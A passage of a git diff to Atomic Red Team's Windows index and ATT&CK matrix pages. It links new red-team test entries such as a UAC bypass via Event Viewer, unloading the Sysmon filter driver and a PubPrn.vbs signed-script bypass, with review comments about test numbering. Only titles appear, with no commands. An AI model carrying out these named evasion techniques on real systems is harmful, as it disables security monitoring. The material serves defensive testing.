| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | [Process Injection](./T1055/T1055.md) | | | | | | |
-| | | Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Screensaver](./T1180/T1180.md) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rootkit](./T1014/T1014.md) | | | | | | |
@@ -53,7 +53,7 @@
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | [Trap](./T1154/T1154.md) | | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Timestomp](./T1099/T1099.md) | | | | | | |
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 0b340fb7..2953ffd3 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -6,7 +6,8 @@
- Atomic Test #1: Download & Execute [windows]
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- [T1009 Binary Padding](./T1009/T1009.md)
-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -23,6 +24,7 @@
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1089 Disabling Security Tools](./T1089/T1089.md)
+ - Atomic Test #8: Unload Sysmon Filter Driver [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
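Review bot: the added line `+ - Atomic Test #8: Unload Sysmon Filter Driver [windows]` is the only test listed under `[T1089 Disabling Security Tools](./T1089/T1089.md)` in this index, so the numbering starts at #8 with no #1 through #7 shown in the surrounding context. If tests #1 through #7 are non-Windows and are therefore left out of windows-index.md by design, this is expected; if any of them are Windows tests they are missing from the index, and if this is in fact the first Windows test the number does not match T1089.md. Please confirm the number agrees with the test ordering in T1089.md before merging.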
@@ -88,7 +90,8 @@
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1064 Scripting](./T1064/T1064.md)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1099 Timestomp](./T1099/T1099.md)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
@@ -114,7 +117,8 @@
- Atomic Test #1: Install AppInit Shim [windows]
- [T1138 Application Shimming](./T1138/T1138.md)
- Atomic Test #1: Application Shim Installation [windows]
-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -210,7 +214,8 @@
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
-- T1180 Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1180 Screensaver](./T1180/T1180.md)
+ - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -253,6 +258,7 @@
- [T1063 Security Software Discovery](./T1063/T1063.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
+ - Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
- [T1082 System Information Discovery](./T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- [T1016 System Network Configuration Discovery](./T1016/T1016.md)
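Review bot: the T1063 list jumps from `Atomic Test #2: Security Software Discovery - powershell [windows]` to the added `Atomic Test #4: Security Software Discovery - Sysmon Service [windows]` with no #3 in between. If Atomic Test #3 is a non-Windows test the gap is expected for windows-index.md; if it is a Windows test it should appear here as well, and if the new test is really the third Windows entry in T1063.md the number should be #3. Please confirm against T1063.md so the index numbering stays consistent with the technique page.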
@@ -406,9 +412,11 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- [T1064 Scripting](./T1064/T1064.md)
-- T1035 Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1035 Service Execution](./T1035/T1035.md)
+ - Atomic Test #1: Execute a Command as a Service [windows]
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md
index 58a8a442..097ca128 100644
--- a/atomics/windows-matrix.md
+++ b/atomics/windows-matrix.md
@@ -4,9 +4,9 @@
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](./T1201/T1201.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Hooking](./T1179/T1179.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote File Copy](./T1105/T1105.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Permission Groups Discovery](./T1069/T1069.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -18,9 +18,9 @@
| | [Rundll32](./T1085/T1085.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Scheduled Task](./T1053/T1053.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](./T1049/T1049.md) | | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scripting](./T1064/T1064.md) | [Hooking](./T1179/T1179.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](./T1107/T1107.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hypervisor](./T1062/T1062.md) | [Scheduled Task](./T1053/T1053.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Service Discovery](./T1007/T1007.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Service Execution](./T1035/T1035.md) | [Hypervisor](./T1062/T1062.md) | [Scheduled Task](./T1053/T1053.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Service Discovery](./T1007/T1007.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | | [System Time Discovery](./T1124/T1124.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
-| | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Signed Script Proxy Execution](./T1216/T1216.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Scripts](./T1037/T1037.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Modify Existing Service](./T1031/T1031.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Netsh Helper DLL](./T1128/T1128.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | | | | | |
@@ -32,7 +32,7 @@
| | | [Registry Run Keys / Start Folder](./T1060/T1060.md) | | [Mshta](./T1170/T1170.md) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [NTFS File Attributes](./T1096/T1096.md) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | [Network Share Connection Removal](./T1126/T1126.md) | | | | | | |
-| | | Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
+| | | [Screensaver](./T1180/T1180.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](./T1055/T1055.md) | | | | | | |
@@ -44,7 +44,7 @@
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | | | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | | | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |